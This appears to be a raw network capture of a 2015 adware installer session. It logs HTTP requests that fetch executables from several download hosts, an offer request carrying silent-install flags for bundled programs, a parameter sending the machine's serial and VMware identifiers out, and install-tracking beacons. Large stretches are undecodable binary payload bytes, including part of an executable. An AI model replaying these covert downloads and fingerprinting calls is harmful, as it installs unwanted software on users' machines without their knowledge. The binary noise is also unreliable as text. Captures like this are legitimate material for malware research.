'**...|.X~..>...."..E....\.@.....;|T/c..._.|*]....J.@..{...%.a.j...
w....?.p....fm...gwg..r. P.-..Cnf37`...w......%SF....m...z.?lva....Z.m
.*.$..........~.......s..q......6e.......C..@.~...'.4..Y......... Vj..
........_.].........H..Qv17. ..7.:...u..9..J.I)......O......S4.....{..
"oB..3.:.".. =&%0.m!.......:..._....H.*V6'.`Pk\,.R..rZ.A...r\..[..p...
^.)..>u.nY...K1b9.........r.%F....6X..."..}7N3yy..k2..q.M(.1.&.$...
>V_#: ..wK[&J... r>..Yo..I"<]<.A..\d.... .5v1..:G>B .I"
U....%}....n......H..mtD...6..........'Q.q.D..((R.........W......a....
]y......5.....Bc.M...#.......m......O]../.O...u..Y...Kw<...._......
..;9K..XTA.'5.,~....Et<.J.....]./...^.J...W.x..s....g!...u8\....f..
...&.Y..JRd0.{..~m7_..KxS....."....B....7..6.u%....t(Z.6x|3N.p....nW.]
6..,.......P..K...8...M...^x2}..O.A...9.}..^M..W...V9]......:.v....p |
.........%.e...."....# ....%.......... I.!.P..3......)...T.U.......|.I
......}.. ........{....QqC...5.l.Yv...].Zxc~5......Pr...(.;...`a....SD
ZXg...~.t..<1..K.....T.o..m.............`...5...s...Y.T..i......^..
..) .E..\q:BQ..........Z..4..x.g...dADK.Yl/._.!...91.Ps....9s.....9...
.z!m>Q.L.|..'....8...\.."=WiW..O..D..Z.E>$H....x^.....q...C..=..
}..Kg....#b^Y..AEU......&..@o&.4.......l..u.-\....).B.7.......V....X..
...l.........>......2.a...O0...d..h^.././.b...fBj......s.H(o.PG*...
.C...n./.r.. -i.Z.cH.....T.g.*...0w.V..6....Gk [email protected]. [email protected]^...F
U,..1..RgdaK........$ ....G..n) $,.|7.f.3y$.#..].4yx......B6.6.,%n
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=9750000-9999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=9000000-9249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=10250000-10499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=9500000-9749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=10750000-10999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=9750000-9999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:34 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3325
Content-Length: 250000
Content-Range: bytes 9750000-9999999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400134.dop010.am4.t,1429400134.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
..&S.....qu..,:.iGW..q./.*..sW.&.a.....8D&.Qq.<...Cz?.....I......f.
.o....B.6%..qk0.@.\...$.z/UNb..[[email protected]........!.s....%6.WOs.w....
Z#......(.L[.%r.3G..Y;A..$.GV..&2<.S..=.N.c....;..>...1.wwZ.....
.....8./T8.-..p&..._*FG.D.h.2......x;Q.Z/......{....Z.......>..4-.i
....1........ t...B....K....Z.8.I..=.1j....p..^..^.....I-F.......M....
.>.=y-[.{..).ks.....SL..'...2...L[.....X,......0.S..;/..O.e..s...D.
u]...@*u.R.~..)%.f..C.......K/.........Yt..,.4.#...|u.*..C.....d).!.].
...-`.=2.7.7...........4.....v&5B#....LbU.B..3...*.1AT....OF&.....V..f
.&......o..N................r.r)h r...'.Y.Q.r=.......I.....M.3....mc.6
 ..wh..o...H..D..3.....s..... u1..]..j.1*...P.|^.7........;2#....w[^.!
k.......2.ã.|...{.....?3z.....gByw|......UD..^.......3M/..nq...W...)
.I.:...q..($..I..^.T....p:u4..,1p.....gs[e.1..x>.....>_...RC..X8
./y..8........I..i........s..r^........0O..^....p.[.(...B..#..S.b....;
..#.?..........:.i......I..9s.Av..E.......Om..l....hu..]Hy4.....S.....
0...'.B7(.pe......[@.b..X(..8}g..[A.wz.3.&.b..w.L......;1......t...ln.
.(....`.)=.X.gv..?m..g.U.. @....AT.*f....Z......1..?..FS..h...D..,P..r
....'gRQ. .. .3n..X#.....!JJ......Z.r7QI.w.9Kadd...a{..M..N.U1.w...k..
Q@./..8.q.d....4..j....WlJ.A...K.........g.{....vb.E8..S.D.zx.....P^.9
1.....1.q..Q.C.....v..i..JJ..SY.Xz.`....VaM.....GUj'....p...:TC.Z..k`|
-.3.:..]$.......!...F'.$.MBE./.!....)......J.A..S.<.h&......ul.....
0.O.9......;,9V.c.p..:.3......}.......%6.M.A.9...p.Lb..Y.q.p.N>./y.
.....;S...."}........B7...?....j..;,T..!...?.5.M..I......wr5.....*
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=11250000-11323779
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



...~{T...1.>$ j.IX.o].l.........!..:F.....,_..K....&.....76O..W..8.
`.Tz.T.,....&...l.^.d.g..5xO.............K...Z.......!` .-<.(..c...
...!d.P..=m.E..W...I:..................8.....Z...U.... .xyE.ga...E.Y./
...a.G....K...q...U~........S.U..3..1..S%Ji...d...=./...... .|w...._..
O...X..V..t.J...u.n.).h..e.J..b.d.)2....~.!.L4..?..*)...=.../.. .HLa..
..kG.....G.s:;.~..Flw=.C.....<..Xv.f..O@.,X.......9"5....wP.k..:.~w
[email protected]....#.qo.a......'.7..
..hp.......9.1Nj g..GD.W.|].....=...WPt zB.|.q.A..}..9.;...?)......[k?
a.r''M......d.i.#oA,..x~...G .>{..\ ......5......V..t\...). 6.....k
.r..N..{m..V..- ..... .8H."...........c:..d.S..cjK.........^S{u.....,.
...h"..t.'..... ..st]N...5....{.d.P .pvR...l#._.....h.4.7....`IXF.Kl.;
.....Jy.'.....x.d.9..4.C..n.gf.V.E..Y_.]p..yYE....(........ eG.o.S.6..
..*.$e.......l..|^.h.]..C....0....I.2>5.....X..!5..iK.q.(.:,.. fi..
e....N$F...Z..J`.q...B.!..u..g......R...9....[[...*Q.Z.@...*..D._.P.Y`
N.b.'@.V....".-..O..,O o....w.Z0h.FK{..<....L'_...}.....U.O>....
.n...80.Y.........$.$.mr[([email protected].._}S<..."......... li..G#'1..%.
-I.j.....6H.........A..F........UU...1.......W{......`.....M..O7..U.q.
z...["0.C..`....;..a...........6y.....;(i.....q...u...3.|....t......L7
...-F4...]..$.m.y........w.4. .3.P..J.........U...=......<...>g.
lg_...........>fKkl.b.......1-D.lX..v...f^*..&.G......e.....98L..&.
......FR.~..O(...o.y.@.`)'.?R.7 K..Q.....sk.~x?.3g......:...33...&hvU|
.....T.ad.<e...h...............-..&....[vL....e.....Ie(..%.[{..
<<< skipped >>>


GET /29141.ashx?e=043Mckb8Lnhw7iCtSAyu//3K4Um6afGylFbWIrYO79FAXdQqxJ1va3sc7hbJtTJHVR5AawbKoxq2WoUK/ytStDqVCe9eXWcZYCpHZc9ZUaH6MIOzDij/FhQC drCF7eF njmPLTFBJTHZ0SBJrLapqEsFB7attMxqzK4ONZfy8uwkk WHLaN3BOpzAENMeu5HLnHRSngDc8= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:15 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:15 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /29141.ashx?e=lOCrbsNL2zXk4TYbHkoM1L0oSfJOuBg0a6Y79bPE7emMDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ LeHocDMDEaHrXIxNf6X/p8jq1U t1gQfOJGi8wh2qItjgb6v7cXpPvVs 1hpnKPWNckWery5nY61wQMeOGfVSoE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:16 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000805&country=ua&app=70299&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 HTTP/1.1
Host: logs.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:50 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1429400150.dop009.am4.t,1429400150.cds058.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 18 Apr 
2015 23:35:50 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1429400150.dop009.am4.t,1429400150.
cds058.am4.c..GIF89a.............,...........D..;..



GET /v4/sof-windowspm/?action=visit.heartbeat.wpmvt&update3=version,20.0.0.1953 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:22 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
3d..{"stats":"error","time":"0.08 ms","message":"uid is not set"}..0..
....


GET /v4/sof-windowspm/?action=visit.heartbeat.wpmvt HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:22 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
3d..{"stats":"error","time":"0.07 ms","message":"uid is not set"}..0..
HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 2015 23:36:22
 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunk
ed..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v
4..3d..{"stats":"error","time":"0.07 ms","message":"uid is not set"}..
0..



GET /online/RegisterAnon.aspx?ProductID=12000&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList= HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 18 Apr 2015 23:35:36 GMT
Connection: close
<RESULT>.<ANON>.<ID>e59a543c-07c1-4575-b0a1-b17d7cfa
c7a7</ID>.<PW>l6G2E4Yn</PW>.</ANON>.</RESUL
T>...



GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
Range: bytes=178475-
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 107083
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 178475-285557/285558
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 2636148dc4ff819fda62f785a179ffd2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: OG0NCRB53m3MuwNkLGLcL1CpR5zqmIVaqom3VRCDarVEBsTSdnGayw==
w.N>.Pq..A)...[N......B.x../.>[email protected]..
N.Z......j..&...h....A.hO..\....'.....sj.`.....H.S.|.s=.......I.)L>
...c....i.>.....G.u..H.D....P......qC0<.(...m..y.dm.\1N.m...v.T`
- .Ss. .G2..rk.......N{[email protected].......}......6P$....2
.52..!.x....L.R. [email protected],.].\...a..........k
.....A.....P....u`..I.///....b~.y..^...P...z..p..:.d.....R.4....U. ...
../.M]..~.........(...... y.).. ..In.I.)..ua.*..N!Q.......1.e..b)F5...
x.bS..f..|q.H..K...V.`.^...x!Su4_"?...uc.tY.m...%....r..be.z. ....0.^.
....]y........)... .u_/..V..6).v..\.7n-z.q.............Y.w.oBk..f..}..
[email protected]. .*.b.;..).....|.\@c..)......H.P..;......!"...gN.......9W..
.. ......NJJJ....N|..)T..aU..1....5~.G...=d.m..Qfl..?.yO|e...`.sXm$Op;
."p................t=V.........Q....f.r0.........i...M......E....Y.../
....N.7/.;.....|..R...(./.4..{)..~.M....).......f.w...6.^.0TB...H..c..
.....^-a.G`0ub..|a;.C..T.<..N/......^..>."....f..$..d.=.X0..x4R.
..W...=.....`..w.$\a/.~R.~<.....jS.q.es....-.....#W#.D.4H...tw...&.
A.w/...t...[H"D....9E].....A....B<D.7[.2.3.!.......P.......R..R._.I
...y........([email protected].\D.k.2....3..".".......
.p...?_X.........$v.....,......\.V..EV.G...........Z.DO....B..V...%.D.
...].n..`...H.!..=<.. Y.*l..].j.u.d.o.M.i...>..m........$K..@...
..]~.H.z.p.O.?.i.&.U.....U."<..o.S#..x.....s..g.[.....A.6~'-.1D....
....`Pim2....;.xsV2.'7.#..jlW.1-..4......h ..~...oV..."...]|..i=.....V
(.....e..!..EU.d....ui..9).....^P.o.g..e..H.1x.....\.#..D....G.w.p
<<< skipped >>>


GET /downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:11 GMT
Expires: Sat, 18 Apr 2015 20:48:31 GMT
Cache-Control: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 4114a531d58828535cc716aecd1ea068.cloudfront.net (CloudFront)
X-Amz-Cf-Id: dD08A81XRcUwbySCcNdJppym9kV-MdVUgHDeX11ijRf94up_BuyreA==
2c39.............}.~.F......:qH...;=.J0........I..... .....KD...g.Ov..
..B..e;...L[.P.*.r...9..M.....6\.G...p...{.Q....E\K..l...`..o.%...d.].
j|)......y.>.......O.ZT..>@.M.I.V6./..(..Ie.-xw...F.}..^.]....^.
...<..7...`.u...... .....g.0M......l.......c.\L.."..-.....]N..W.&.u
...... ......._..8.x6....<..........C<K.... ....T..I<.....t1.
..\~q%...^...d.]....2h......0x?>.a.fY"....r4..~.d9.b_L..........J.E
....2=c.....5.....u.t...C.'.x...h1.......n|..A{1[.a...z.!g.K.i:c...[.r
6.....n<;.Lg...}........t6.'Yr..F.<............l.......l...m....
Z....l..yz....G....:u6^f={G6..c..G..O..l...=....n...ef.......>,.w.j
g..7...xn......O..Y../{g....h.....r..}....lU.D>:~_./...s.....Og. ..
.1.....r...{....l..\...l....9...g.Xs...n/N......y.......s7............
U....a..c............}.].*.v.G.9..9../$....`:[email protected]..
w....U..T...........?|y.}..........W....r..so(_..{..g. .w..{.g.ka. fW.
W~...W~...w*.......y<.|......|. .3w.........y{......s. ..n..nZ.....
g.%.........h..>..(....C...0."*.....)...A<O.F.?|.....4...!..e...
c^. S.o.J...{.............Ge._N....a7L.W.t..M.2..m..qu..qk......._.` .
^^..7..B..-p#.....F.....A.:..T.....Ik.N...A..6..~.gnDQ...l...~r..FQ..6
.)...`....G.....pu......g;o^_..y..c..0n\..r6.......>.v(k7T(....LU:3
...U-.7....ps[.&..?g..>....O.."jq..'...b......b....<nAJMg`.Z...m
B...~...`4....?S.}.X..X..[..(.:...Y.Ox;.?U5...Q.t.....{...j}k.5_..#..?
.M..j...=..n.-._b....z..V,^.0B>...w.Y..9p%..xs.........=..&K..}K'?.
._.^..x.../.....~.6..Z{A.S9.n.q0.[X .|.{:......c.>.v..i....P..?
<<< skipped >>>

GET /installer/ajax-bidl?offers[youtubeaccelerator][exec_args]=/S /MAG=smtyc  &offers[swiftrecord][exec_args]=/np 1 /is smp1ua  &offers[istartsurf][exec_args]=-silence -ptid=smt  &offers[appshat_madness][exec_args]=/S /affid=appshatmadness&uid_orig=F6EC7CBD433C497E8CB84BD73DB5F5E3&uid=4a9fc2e26d3c3249b974ded373db7ae1&tokyo_csrf_key=30dac423b2616dcb0f6bc321e4d0a8d9&tokyo_csrf_timestamp=1429400111&ffInstalled=false&dfz=false&affid=thetetrisgame&sid=thetetrisgameezsg&country=UA&hostBrowser=ie&unique_id=false HTTP/1.1


x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:11 GMT
Expires: Sat, 18 Apr 2015 20:48:31 GMT
Cache-Control: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 4114a531d58828535cc716aecd1ea068.cloudfront.net (CloudFront)
X-Amz-Cf-Id: JjA0c9DGg2I0ciLzgGDZ5NrO-51m2nc1xOjAgyoeK4Besus7qjCX3w==
522.............Xmo.8.. .?.I..........b..]1,...t"..|..4 ......m.\.....
M)Q")......OA..;w%.SL.E.......<vG..<W..p..,.P.9..yn.R\....&.I3nK
...:..j..RY....4..I3c.Ise......WQ...y.n..J.C...}~..C..D!S34..4...yy...
[email protected]@...2.pA...z..pZ.#q..;.9...
(..........ss.M..!Z...Rf8).......U.......>.3..ZmO..:.{...}..-t..Vx.
[email protected].......|..".a.d.x.Y...q
....l.t...X.cs...}.%...vx.:.-.#=........5..\j.xQ(...S="I>.[......c.
0._4 ..{\@B..#c....\.T....^1...#...i.t..s......z}w.a.c..8d....WV..o$.4
.\.$...30.....}.}/..o........Q\.`F"@W..J.."...>...n.u........K...@.
.'FA$...mEu..ri......|.[gQ,.f......&M...5..G...o....;>......~.~.V.a
.[SkK6..#....Y...'t.`.;...X...i.....l.......b...T...X8...GZ..6.&L....T
....Z..3O..6.9R....T.)..hS....vj|.\6f\.)/n9.K.Um.e.X..*.'.!....Z?..9E.
...[L..'...iC.,E.UV2.pY2....[0.mU\ ...yY..Ho..N.w]...q6 .W1....c......
7.tw...A..c.........l.N.r....(...d..C...8......,.[.c....T!".f.\.<Z8
k..#..JF..c.@.... ..MPI....F.E....Q-fh..q.)...6F.....[..#...?h..Q...q.
).*...V:..dIB.\.)..5....C..5.G7...N.m.f.9...^.T.......*.s=g&.X,h.Z....
.........x<...l8.$7.x.....\).&M.X.8.h...O...f. <.....p..........
.A_.<[email protected]....*..t..Bk..3..x...f..(wJ9.}..z....
..i..s_.e\}..Rl0.eeY..X..=Z%....g... N:....Z~..z..t.^.......TW2<.$R
Y.CV.=..Z...............0......
<<< skipped >>>

GET /pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.3328616623796952 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:11 GMT
Expires: Sat, 18 Apr 2015 20:48:31 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4114a531d58828535cc716aecd1ea068.cloudfront.net (CloudFront)
X-Amz-Cf-Id: S4EKRfC5FgBkZ8OAnKbmrtdiyq-RBX8327_K1bFxsvTs3gmCKF2Hww==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:11 GMT..Expires: Sat, 18 Apr 2015 20:48:31 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4114a531d58828535cc716aec
d1ea068.cloudfront.net (CloudFront)..X-Amz-Cf-Id: S4EKRfC5FgBkZ8OAnKbm
rtdiyq-RBX8327_K1bFxsvTs3gmCKF2Hww==..0..



GET /sd?is=sm HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:13 GMT
Date: Sat, 18 Apr 2015 23:35:13 GMT
Content-Range: bytes 0-523271/523272
Content-Length: 523272
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z....... ...0.......p....@.........
................. ......l........................................s....
......................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
.....p..............@....ndata.......p...........................rsrc.
...............t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>


GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.regok HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:35:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.26 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:35:45 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"1.26 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDmFsbNcBDBl+cij2b1soa7 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.comodoca.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:22 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 18 Apr 2015 05:51:40 GMT
Expires: Wed, 22 Apr 2015 05:51:40 GMT
ETag: 43F9232FB98D17FE2DC6ABDA98F49B749EB73CB1
Cache-Control: max-age=280997,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp5
Content-Length: 472
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........,}...h|%....?......2015041
8055140Z0t0r0J0... .........%.6..Ga....e............,}...h|%....?.....
......p....".f........20150418055140Z....20150422055140Z0...*.H.......
................7..j.....?!f%.x.....Jm.u).!?j...<|~...E...B...u..lv
